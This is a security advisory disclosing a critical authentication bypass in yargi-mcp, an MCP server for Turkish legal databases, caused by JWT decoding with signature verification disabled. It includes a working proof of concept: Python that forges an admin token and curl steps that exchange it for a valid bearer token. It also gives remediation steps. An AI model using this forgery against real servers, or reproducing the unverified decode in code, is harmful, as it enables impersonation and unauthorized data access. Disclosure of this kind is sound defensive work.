EresusSecurity
Back to Research
Security Advisories

Critical Authentication Bypass via JWT Signature Verification Disabled in yargi-mcp

Yiğit İbrahim SağlamOffensive Security Specialist
April 4, 2026
3 min read

Summary

Eresus Security researchers discovered a critical authentication bypass vulnerability in yargi-mcp, an open-source Model Context Protocol (MCP) server providing access to Turkish legal databases (Yargıtay, Danıştay, Anayasa Mahkemesi, KVKK, BDDK). The OAuth callback endpoint decodes JWT tokens with verify_signature=False, allowing any unauthenticated attacker to forge tokens, impersonate arbitrary users, escalate to admin privileges, and access all protected legal data endpoints.

CVE ID: Pending assignment

Affected Systems

  • Software: yargi-mcp v0.2.0 (main branch)
  • Files:
    • mcp_auth_http_simple.py — line 164
    • mcp_auth_http_adapter.py — line 203
  • Condition: ENABLE_AUTH=true with clerk_backend_api package installed (CLERK_AVAILABLE=True)

Technical Details

The vulnerability resides in the OAuth /auth/callback endpoint. When a Clerk JWT token is received via the clerk_token query parameter, it is decoded using PyJWT with all cryptographic signature verification explicitly disabled:

decoded_token = jwt.decode(clerk_token, options={"verify_signature": False})

This single line defeats the entire purpose of JWT-based authentication. The decoded claims (user_id, email, scopes) are then fully trusted for authentication decisions. At line 177, the server stores the raw, unverified token as real_jwt_token = clerk_token and later returns it verbatim as the OAuth access token at the /token endpoint.

Attack Chain

  1. Attacker forges a JWT with arbitrary claims (sub, user_id, email, scopes) using any random signing key
  2. Sends forged token to /auth/callback?clerk_token=<forged_jwt>
  3. Server decodes without checking signature → issues authorization code (307 redirect)
  4. Attacker exchanges code at POST /token → receives the forged JWT as a valid Bearer access_token

Proof of Concept

Step 1 — Forge JWT:

import jwt
fake = jwt.encode({
    'sub': 'admin', 'user_id': 'admin',
    'email': 'admin@target.com',
    'scopes': ['read', 'search', 'admin']
}, 'any_random_key', algorithm='HS256')

Step 2 — Obtain authorization code:

curl -v "http://localhost:8000/auth/callback?client_id=test&redirect_uri=http://localhost:8000/health&clerk_token=$FAKE_JWT"
# Server returns 307 with Location: ...?code=clerk_auth_<hex>

Step 3 — Exchange code for access token:

curl -s -X POST http://localhost:8000/token \
  -d "grant_type=authorization_code&code=clerk_auth_<hex>&redirect_uri=http://localhost:8000/health&client_id=test"
# Returns: {"access_token":"<forged_jwt>","token_type":"Bearer","expires_in":3600,"scope":"read search"}

Impact

CVSS 3.1 Base Score: 9.8 (Critical) Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Authentication Bypass (Critical): An attacker can forge a JWT with any identity using any signing key. The server accepts it unconditionally.
  • Privilege Escalation (High): Arbitrary scopes including admin can be injected via forged claims with no server-side validation.
  • Unauthorized Data Access (High): All Turkish legal database MCP tools become accessible — Yargıtay, Danıştay, Anayasa Mahkemesi, KVKK, BDDK endpoints.
  • Subscription & Payment Bypass (Medium): Premium features gated by Stripe subscription checks can be bypassed by forging tokens with appropriate user IDs and scopes.

Remediation

  1. Remove verify_signature=False from jwt.decode() in both mcp_auth_http_simple.py:164 and mcp_auth_http_adapter.py:203.
  2. Validate JWT signatures against Clerk's JWKS endpoint (/.well-known/jwks.json).
  3. Enforce issuer, audience, and expiry claim validation in all token decoding paths.
  4. Add redirect_uri allowlist to prevent open redirect chaining.
  5. Implement server-side scope validation — never trust client-supplied scope claims without verification.

Timeline

| Date | Event | |------|-------| | 2026-04-02 | Vulnerability discovered by Eresus Security Research during MCP security audit | | 2026-04-02 | Private disclosure request submitted via GitHub Issues (#21) | | 2026-04-02 | Vendor requested to enable GitHub Private Vulnerability Reporting | | 2026-04-04 | Full technical advisory with PoC disclosed publicly |

References

Credit

Discovered by the Eresus Security research team (Yiğit İbrahim Sağlam, @EresusSecurity) during a proactive MCP ecosystem security audit.

Security Validation

Have you tested this risk in your own system?

Eresus Security delivers real exploit evidence through penetration testing, AI agent security, and red team operations.

Request a pilot test